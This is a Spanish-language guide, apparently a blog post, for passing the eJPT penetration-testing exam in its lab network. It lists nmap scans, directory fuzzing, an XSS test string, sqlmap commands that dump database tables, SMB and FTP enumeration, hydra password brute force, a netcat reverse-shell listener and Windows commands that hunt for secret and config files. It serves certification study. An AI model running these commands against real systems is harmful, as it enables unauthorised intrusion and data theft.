Aprobar el eJPT a la primera
El presente artículo contiene una guía del procedimiento a llevar acabo para aprobar con éxito el examen de la certificación eJPT.
Barrido de ping
Una vez te conectes por VPN al laboratorio, lo primero que deberías hacer es un reconocimiento al sistema, encontrando activos, para lo cual los siguientes comandos te serian de ayuda:
nmap -sn 10.10.10.0/24
fping -a -g 10.10.10.0/24 2>/dev/null
Escaneo exhaustivo
Ya en este punto, después de tener tu lista de host activos, lo siguiente que deberías hacer es un escaneo más exhaustivo, es decir listar los puertos abiertos con los que cuentan los host, así mismo como los servicios y versiones que están corriendo en ellos. No olvides ir guardando todos tus escaneos y datos relevantes encontrados.
nmap -p- --open -n -v -T5 10.10.14.16 -oN puertos
sudo nmap -sS --min-rate 200 -p- --open -n -v -Pn 10.10.14.16 -oN puertos
nmap -sV -sC -p21,22,80 10.10.14.16 -oN serviciosVersiones
nmap --script=vuln -p22,21,80,445 -v 10.10.14.16 -oN vulnScan
nmap --script=smb-vuln* -p445 -v 10.10.14.16 -oN smbScan
En esta etapa también debes ir realizando un reconocimiento a todos los servicios y puertos listados con los comandos anteriores, algunas cosas que deberías probar dependiendo el puerto y/o servicio seria:
Servicios Web
nmap --script=http-enum -p80 10.10.14.16 -oN webScan
wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ
wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ.php
- XSS
<script>alert(xss)</script>
<h1>H1</h1>
- SQLMap
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname -T table_name --dump
Enumeración de SMB
smbclient -L 10.10.14.12 -N
smbmap -H 10.10.14.12 -u 'null'
nmap --script=smb-vuln* -p445 10.10.14.15 -oN smbScan
smbmap -H 10.10.14.15 -R backups -u 'null'
smbclient //10.10.14.15/backups
Enumeración de FTP
nmap --script=ftp-anon -p21 10.10.14.12
ftp 10.10.14.12
cd ..
Explotación
En esta fase es en la cual debes aprovechar de los resultados anteriores obtenidos, con esos resultados podrás buscar posibles exploits o maneras de aprovecharte de ellos, como por ejemplo:
FTP - Fuerza Bruta
hydra -l admin -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.1
Pista: Después de encontrar lo que te solicitan podrías necesitar unshadow y john
Reverse Shell
Si te basas en los resultados anteriores y te ayudas de Google o searchsploit necesitarás:
- nc
nc -nlvp 443
- metasploit
msfconsole
Enumeración de windows
Una vez hayas comprometido el activo, deberás enumerar lo, los siguientes comandos te serán de gran ayuda:
dir /b/s "\*.conf*"
dir /b/s "\*.txt*"
dir /b/s "\*secret*"
route print
netstat -r
fsutil fsinfo drives
wmic logicaldisk get Caption,Description,providername
Post Explotación
Ahora, una vez hayas realizado todo lo anterior, deberías preocuparte por descubrir nuevos activos y repetir los pasos anteriores si fuese necesario.
Wireshark
ip.addr==192.168.12
ip.src == 192.168.2.11
ip.dst == 192.168.2.15
IP Route
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
Recomendaciones
- No olvides revisar el material que te entregan antes del examen.
- Si deseas ver solo los comandos necesarios o alternativos para el examen, revisa mi eJPT - Cheatsheet